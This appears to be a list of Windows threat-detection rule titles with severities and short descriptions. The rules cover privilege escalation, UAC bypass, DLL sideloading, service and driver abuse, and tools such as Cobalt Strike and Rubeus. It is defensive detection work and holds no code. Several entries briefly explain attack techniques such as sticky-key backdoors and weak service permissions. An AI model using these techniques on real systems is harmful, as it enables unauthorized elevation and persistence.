CodeIntegrity - Disallowed File For Protected Processes Has Been BlockedhighDetects block events for files that are disallowed by code integrity for protected processes
CodeIntegrity - Blocked Image/Driver Load For Policy ViolationhighDetects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.
CodeIntegrity - Blocked Driver Load With Revoked CertificatehighDetects blocked load attempts of revoked drivers
CodeIntegrity - Revoked Kernel Driver LoadedhighDetects the load of a revoked kernel driver
CodeIntegrity - Blocked Image Load With Revoked CertificatehighDetects blocked image load events with revoked certificates by code integrity.
CodeIntegrity - Revoked Image LoadedhighDetects image load events with revoked certificates by code integrity.
CodeIntegrity - Unsigned Kernel Module LoadedhighDetects the presence of a loaded unsigned kernel module on the system.
CodeIntegrity - Unsigned Image LoadedhighDetects loaded unsigned image on the system
CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel ModulehighDetects loaded kernel modules that did not meet the WHQL signing requirements.
Standard User In High Privileged GroupmediumDetects logins of standard users that are part of highly privileged groups such as the Administrator group
ADCS Certificate Template Configuration VulnerabilitylowDetects certificate creation with a template allowing a risky subject permission
ADCS Certificate Template Configuration Vulnerability with Risky EKUhighDetects certificate creation with a template allowing a risky subject permission and a risky EKU
CobaltStrike Service Installations - SecurityhighDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
HackTool - NoFilter ExecutionhighDetects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators
Meterpreter or Cobalt Strike Getsystem Service Installation - SecurityhighDetects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
Register new Logon Process by RubeushighDetects potential use of Rubeus via registration of a new trusted logon process
Service Registry Key Read Access RequestlowDetects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
SCM Database Privileged OperationmediumDetects non-system users performing privileged operations on the SCM database
Service Installed By Unusual Client - SecurityhighDetects a service installed by a client which has PID 0 or whose parent has PID 0
Win Susp Computer Name Containing SamtheadmincriticalDetects the suspicious computer name samtheadmin-{1..100}$ generated by a hacktool
Addition of SID History to Active Directory ObjectmediumAn attacker can use the SID history attribute to gain additional privileges.
Account Tampering - Suspicious Failed Logon ReasonsmediumThis method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Group Policy Abuse for Privilege AdditionmediumDetects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.
Startup/Logon Script Added to Group Policy ObjectmediumDetects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.
Suspicious Scheduled Task CreationhighDetects suspicious scheduled task creation events, based on attributes such as paths, command line flags, etc.
Important Scheduled Task Deleted/DisabledhighDetects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
Suspicious Scheduled Task UpdatehighDetects scheduled task update events that contain suspicious keywords.
User Added to Local Administrator GroupmediumDetects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity
User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'highThe 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. This may indicate Rubeus trying to get a handle to LSA.
WMI Persistence - SecuritymediumDetects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
DiagTrackEoP Default Login UsernamecriticalDetects the default "UserName" used by the DiagTrackEoP POC
Potential Access Token AbusemediumDetects potential token impersonation and theft. For example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS" flag.
Potential Privilege Escalation via Local Kerberos Relay over LDAPhighDetects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.
RottenPotato Like Attack PatternhighDetects logon events that have characteristics of events generated during an attack with RottenPotato and the like
KDC RC4-HMAC Downgrade CVE-2022-37966highDetects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation
Certificate Use With No Strong MappingmediumDetects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID). This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.
Vulnerable Netlogon Secure Channel Connection AllowedhighDetects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.
CobaltStrike Service Installations - SystemcriticalDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
KrbRelayUp Service InstallationhighDetects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)
Meterpreter or Cobalt Strike Getsystem Service Installation - SystemhighDetects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
Moriya Rootkit - SystemcriticalDetects the use of the Moriya rootkit as described in Securelist's Operation TunnelSnake report
New PDQDeploy Service - Server SidemediumDetects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines
New PDQDeploy Service - Client SidemediumDetects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1
ProcessHacker Privilege ElevationhighDetects a ProcessHacker tool that elevated privileges to a very high level
Sliver C2 Default Service InstallationhighDetects known malicious service installations that appear in cases in which Sliver implants execute PsExec commands
Service Installed By Unusual Client - SystemhighDetects a service installed by a client which has PID 0 or whose parent has PID 0
Suspicious Service InstallationhighDetects suspicious service installation commands
Uncommon Service Installation Image PathmediumDetects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
Service Installation in Suspicious FoldermediumDetects service installation in the suspicious folder AppData
Service Installation with Suspicious Folder PatternhighDetects service installation with suspicious folder patterns
Suspicious Service Installation ScripthighDetects suspicious service installation scripts
WMI PersistencemediumDetects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
Rare Remote Thread Creation By Uncommon Source ImagehighDetects uncommon processes creating remote threads.
Remote Thread Creation By Uncommon Source ImagemediumDetects uncommon processes creating remote threads.
Remote Thread Creation In Uncommon Target ImagemediumDetects uncommon target processes for remote thread creation
Malicious Driver LoadhighDetects loading of known malicious drivers via their hash.
PUA - System Informer Driver LoadmediumDetects driver load of the System Informer tool
Malicious Driver Load By NamemediumDetects loading of known malicious drivers via the file name of the drivers.
Driver Load From A Temporary DirectoryhighDetects a driver load from a temporary directory
PUA - Process Hacker Driver LoadhighDetects driver load of the Process Hacker tool
Vulnerable Driver Load By NamelowDetects the load of known vulnerable drivers via the file name of the drivers.
Vulnerable HackSys Extreme Vulnerable Driver LoadhighDetects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors
Vulnerable WinRing0 Driver LoadhighDetects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation
Vulnerable Driver LoadhighDetects loading of known vulnerable drivers via their hash.
Potential PrintNightmare Exploitation AttempthighDetects DLL deletions from the Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
Creation Of Non-Existent System DLLmediumDetects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
DLL Search Order Hijackig Via Additional Space in PathhighDetects when an attacker creates a folder structure similar to Windows system folders (Windows, Program Files, etc.) but with a space, in order to trick the DLL load search order and perform a "DLL Search Order Hijacking" attack
HackTool - Powerup Write Hijack DLLhighThe Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).
Malicious DLL File Dropped in the Teams or OneDrive FolderhighDetects creation of a malicious DLL file in the location where the OneDrive or Teams applications reside. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
PowerShell Profile ModificationmediumDetects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence
VsCode Powershell Profile ModificationmediumDetects the creation or modification of a VSCode-related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence
LiveKD Kernel Memory Dump File CreatedhighDetects the creation of a file that has the same name as the default LiveKD kernel memory dump.
LiveKD Driver CreationmediumDetects the creation of the LiveKD driver, which is used for live kernel debugging
LiveKD Driver Creation By Uncommon ProcesshighDetects the creation of the LiveKD driver by a process image other than "livekd.exe".
Process Explorer Driver Creation By Non-Sysinternals BinaryhighDetects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
Process Monitor Driver Creation By Non-Sysinternals BinarymediumDetects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
PSEXEC Remote Execution File ArtefacthighDetects creation of the PSEXEC key file, which is created any time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
Potential Privilege Escalation Attempt Via .Exe.Local TechniquehighDetects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
UAC Bypass Using Consent and Comctl32 - FilehighDetects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using .NET Code Profiler on MMChighDetects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
UAC Bypass Using EventVwrhighDetects the pattern of a UAC bypass using Windows Event Viewer
UAC Bypass Using IDiagnostic Profile - FilehighDetects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
UAC Bypass Using IEInstal - FilehighDetects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
UAC Bypass Using MSConfig Token Modification - FilehighDetects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using NTFS Reparse Point - FilehighDetects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass Abusing Winsat Path Parsing - FilehighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - FilehighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Potential Azure Browser SSO AbuselowDetects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL LoadmediumDetects signs of the WMI script host process "scrcons.exe" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumers activity.
Potential 7za.DLL SideloadinglowDetects potential DLL sideloading of "7za.dll"
Potential Antivirus Software DLL SideloadingmediumDetects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc.
Potential appverifUI.DLL SideloadinghighDetects potential DLL sideloading of "appverifUI.dll"
Aruba Network Service Potential DLL SideloadinghighDetects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
Potential AVKkid.DLL SideloadingmediumDetects potential DLL sideloading of "AVKkid.dll"
Potential CCleanerDU.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerDU.dll"
Potential CCleanerReactivator.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerReactivator.dll"
Potential Chrome Frame Helper DLL SideloadingmediumDetects potential DLL sideloading of "chrome_frame_helper.dll"
Potential DLL Sideloading Via ClassicExplorer32.dllmediumDetects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
Potential DLL Sideloading Via comctl32.dllhighDetects potential DLL sideloading using comctl32.dll to obtain system privileges
Potential DLL Sideloading Of DBGCORE.DLLmediumDetects DLL sideloading of "dbgcore.dll"
Potential DLL Sideloading Of DBGHELP.DLLmediumDetects potential DLL sideloading of "dbghelp.dll"
Potential EACore.DLL SideloadinghighDetects potential DLL sideloading of "EACore.dll"
Potential Edputil.DLL SideloadinghighDetects potential DLL sideloading of "edputil.dll"
Potential System DLL Sideloading From Non System LocationshighDetects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
Potential Goopdate.DLL SideloadingmediumDetects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXEmediumDetects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
Potential Iviewers.DLL SideloadinghighDetects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
Potential DLL Sideloading Via JsSchHlpmediumDetects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXEhighDetects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
Potential Libvlc.DLL SideloadingmediumDetects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
Potential Mfdetours.DLL SideloadingmediumDetects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
Unsigned Mfdetours.DLL SideloadinghighDetects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
Potential DLL Sideloading Of Non-Existent DLLs From System FoldershighDetects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
Microsoft Office DLL SideloadhighDetects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
Potential Rcdll.DLL SideloadinghighDetects potential DLL sideloading of rcdll.dll
Potential RjvPlatform.DLL Sideloading From Default LocationmediumDetects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
Potential RjvPlatform.DLL Sideloading From Non-Default LocationhighDetects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
Potential RoboForm.DLL SideloadingmediumDetects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
Potential ShellDispatch.DLL SideloadingmediumDetects potential DLL sideloading of "ShellDispatch.dll"
DLL Sideloading Of ShellChromeAPI.DLLhighDetects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary, which in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Potential SmadHook.DLL SideloadinghighDetects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
Potential SolidPDFCreator.DLL SideloadingmediumDetects potential DLL sideloading of "SolidPDFCreator.dll"
Third Party Software DLL SideloadingmediumDetects DLL sideloading of DLLs that are part of third party software (Zoom, Discord, etc.)
Potential Vivaldi_elf.DLL SideloadingmediumDetects potential DLL sideloading of "vivaldi_elf.dll"
VMGuestLib DLL SideloadmediumDetects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
VMMap Signed Dbghelp.DLL Potential SideloadingmediumDetects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
VMMap Unsigned Dbghelp.DLL Potential SideloadinghighDetects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
Potential Waveedit.DLL SideloadinghighDetects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
Potential Wazuh Security Platform DLL SideloadingmediumDetects potential DLL side loading of DLLs that are part of the Wazuh security platform
Potential WWlib.DLL SideloadingmediumDetects potential DLL sideloading of "wwlib.dll"
Windows Spooler Service Suspicious Binary LoadinformationalDetects DLL loads from the Spooler Service backup folder
DotNet CLR DLL Loaded By Scripting ApplicationshighDetects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
UAC Bypass Using Iscsicpl - ImageLoadhighDetects the "iscsicpl.exe" UAC bypass technique that leverages DLL Search Order hijacking to load a custom DLL from temp or any user-controlled location in the user's %PATH%
UAC Bypass With Fake DLLhighDetects attempts to load dismcore.dll after dropping it
CobaltStrike Named PipecriticalDetects the creation of a named pipe as used by CobaltStrike
CobaltStrike Named Pipe Pattern RegexcriticalDetects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
CobaltStrike Named Pipe PatternshighDetects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
HackTool - CoercedPotato Named Pipe CreationhighDetects the pattern of a pipe name as used by the hack tool CoercedPotato
HackTool - EfsPotato Named Pipe CreationhighDetects the pattern of a pipe name as used by the hack tool EfsPotato
HackTool - DiagTrackEoP Default Named PipecriticalDetects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
HackTool - Koh Default Named PipecriticalDetects creation of default named pipes used by the Koh tool
Malicious Named Pipe CreatedcriticalDetects the creation of a named pipe seen used by known APTs or malware.
HackTool - WinPwn Execution - ScriptBlockhighDetects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
Modify Group Policy Settings - ScriptBlockLoggingmediumDetects malicious GPO modifications, which can be used to implement many other malicious behaviors.
PowerShell ShellCodehighDetects Base64 encoded Shellcode
Potential Persistence Via Security Descriptors - ScriptBlockhighDetects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.
Suspicious GetTypeFromCLSID ShellExecutemediumDetects suspicious PowerShell code that executes COM objects
Suspicious Service DACL Modification Via Set-Service Cmdlet - PShighDetects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (Works only in PowerShell 7)
Potential Persistence Via PowerShell User Profile Using Add-ContentmediumDetects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence
Abuse of Service Permissions to Hide Services Via Set-Service - PShighDetects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (Works only in PowerShell 7)
Powershell WMI PersistencemediumAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.
Uncommon Process Access Rights For Target ImagelowDetects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.
Function Call From Undocumented COM Interface EditionUpgradeManagermediumDetects function calls from the EditionUpgradeManager COM interface, which is an interface that is not used by standard executables.
UAC Bypass Using WOW64 Logger DLL HijackhighDetects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
Interactive AT JobhighDetects an interactive AT job, which may be used as a form of privilege escalation.
Potential Privilege Escalation Using Symlink Between Osk and CmdhighDetects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
Persistence Via Sticky Key BackdoorcriticalBy replacing the sticky keys executable with the local admin's CMD executable, an attacker is able to access a privileged Windows console session without authenticating to the system. When the sticky keys are "activated" the privileged shell is launched.
Sticky Key Like Backdoor ExecutioncriticalDetects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Potentially Suspicious Event Viewer Child ProcesshighDetects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
HackTool - CoercedPotato ExecutionhighDetects the use of CoercedPotato, a tool for privilege escalation
HackTool - CrackMapExec ExecutionhighThis rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - Empire PowerShell UAC BypasscriticalDetects some Empire PowerShell UAC bypass methods
HackTool - Impersonate ExecutionmediumDetects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively
HackTool - LocalPotato ExecutionhighDetects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples
Potential Meterpreter/CobaltStrike ActivityhighDetects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
HackTool - Default PowerSploit/Empire Scheduled Task CreationhighDetects the creation of a schtask via PowerSploit or Empire Default Configuration.
HackTool - SharpUp PrivEsc Tool ExecutioncriticalDetects the use of SharpUp, a tool for local privilege escalation
HackTool - SharpImpersonation ExecutionhighDetects execution of the SharpImpersonation tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively
HackTool - SharpDPAPI ExecutionhighDetects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
HackTool - SysmonEOP ExecutioncriticalDetects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
HackTool - UACMe Akagi ExecutionhighDetects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata
HackTool - winPEAS ExecutionhighWinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
HackTool - WinPwn ExecutionhighDetects commandline keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
Suspicious Shells Spawn by Java Utility KeytoolhighDetects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
Suspicious Processes Spawned by Java.EXEhighDetects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
Shell Process Spawned by Java.EXEmediumDetects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
Windows Kernel Debugger ExecutionmediumDetects execution of the Windows Kernel Debugger "kd.exe".
Potentially Suspicious Child Process of KeyScrambler.exemediumDetects potentially suspicious child processes of KeyScrambler.exe
Mavinject Inject DLL Into Running ProcesshighDetects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
Suspicious Child Process Of SQL ServerhighDetects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
Suspicious Child Process Of Veeam DatabasecriticalDetects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Potential Persistence Via Netsh Helper DLLmediumDetects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
Password Provided In Command Line Of Net.EXEmediumDetects when net.exe is called with a password in the command line
New Service Creation Using PowerShelllowDetects the creation of a new service using powershell.
Abuse of Service Permissions to Hide Services Via Set-ServicehighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
PUA - AdvancedRun ExecutionmediumDetects the execution of AdvancedRun utility
PUA - AdvancedRun Suspicious ExecutionhighDetects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
PUA - Process Hacker ExecutionmediumDetects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
PUA - System Informer ExecutionmediumDetects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
PUA - Wsudo Suspicious ExecutionhighDetects usage of wsudo (Windows Sudo Utility), which is a tool that lets the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
Regedit as Trusted InstallerhighDetects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
Suspicious Debugger Registration CmdlinehighDetects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
Potential Privilege Escalation via Service Permissions WeaknesshighDetects modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
Modify Group Policy SettingsmediumDetects malicious GPO modifications that can be used to implement many other malicious behaviors.
Suspicious ScreenSave Change by Reg.exemediumAdversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
Renamed Mavinject.EXE ExecutionhighDetects the execution of a renamed version of the "Mavinject" process, which can be abused to perform process injection using the "/INJECTRUNNING" flag
Suspicious NTLM Authentication on the Printer Spooler ServicehighDetects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
Rundll32 Registered COM Objectshighload malicious registered COM objects
Scheduled Task Creation Via Schtasks.EXElowDetects the creation of scheduled tasks by user accounts via the "schtasks" utility.
Uncommon One Time Only Scheduled Task At 00:00highDetects scheduled task creation events that include suspicious actions, and is run once at 00:00
Possible Privilege Escalation via Weak Service PermissionshighDetection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
New Service Creation Using Sc.EXElowDetects the creation of a new service using the "sc.exe" utility.
New Kernel Driver Via SC.EXEmediumDetects creation of a new service (kernel driver) with the type "kernel"
Service DACL Abuse To Hide Services Via Sc.EXEhighDetects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
Service Security Descriptor Tampering Via Sc.EXEmediumDetection of sc.exe utility adding a new service with special permission which hides that service.
Suspicious Service Path ModificationhighDetects service path modification via the "sc" binary to a suspicious command or path
Potential Shim Database Persistence via Sdbinst.EXEmediumDetects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Uncommon Extension Shim Database Installation Via Sdbinst.EXEmediumDetects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Sdclt Child ProcessesmediumA General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
Potential Suspicious Activity Using SeCEditmediumDetects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
Suspicious Spool Service Child ProcesshighDetects suspicious print spool service (spoolsv.exe) child processes.
Abused Debug Privilege by Arbitrary Parent ProcesseshighDetection of unusual child processes by different system processes
Always Install Elevated Windows InstallermediumDetects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
Suspicious Child Process Created as SystemhighDetection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
Always Install Elevated MSI Spawned Cmd And PowershellmediumDetects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
Elevated System Shell Spawned From Uncommon Parent LocationmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location.
Suspicious RunAs-Like Flag CombinationmediumDetects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
Suspicious New Service CreationhighDetects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
Suspicious SYSTEM User Process CreationhighDetects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
Process Creation Using Sysnative FoldermediumDetects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
Suspect Svchost ActivityhighIt is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
Bypass UAC via CMSTPhighDetect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
UAC Bypass Using Disk CleanuphighDetects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
UAC Bypass Using ChangePK and SLUIhighDetects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
CMSTP UAC Bypass via COM Object AccesshighDetects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
UAC Bypass Tools Using ComputerDefaultshighDetects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
UAC Bypass Using Consent and Comctl32 - ProcesshighDetects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using DismHosthighDetects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
Bypass UAC via Fodhelper.exehighIdentifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
UAC Bypass Using Event Viewer RecentViewshighDetects the pattern of UAC Bypass using Event Viewer RecentViews
UAC Bypass Using NTFS Reparse Point - ProcesshighDetects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass via ICMLuaUtilhighDetects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
UAC Bypass Using IDiagnostic ProfilehighDetects the "IDiagnosticProfileUAC" UAC bypass technique
UAC Bypass Using IEInstal - ProcesshighDetects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
UAC Bypass via Windows Firewall Snap-In HijackmediumDetects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
UAC Bypass Using MSConfig Token Modification - ProcesshighDetects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using PkgMgr and DISMhighDetects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
Potential UAC Bypass Via Sdclt.EXEmediumA General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
UAC Bypass Abusing Winsat Path Parsing - ProcesshighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
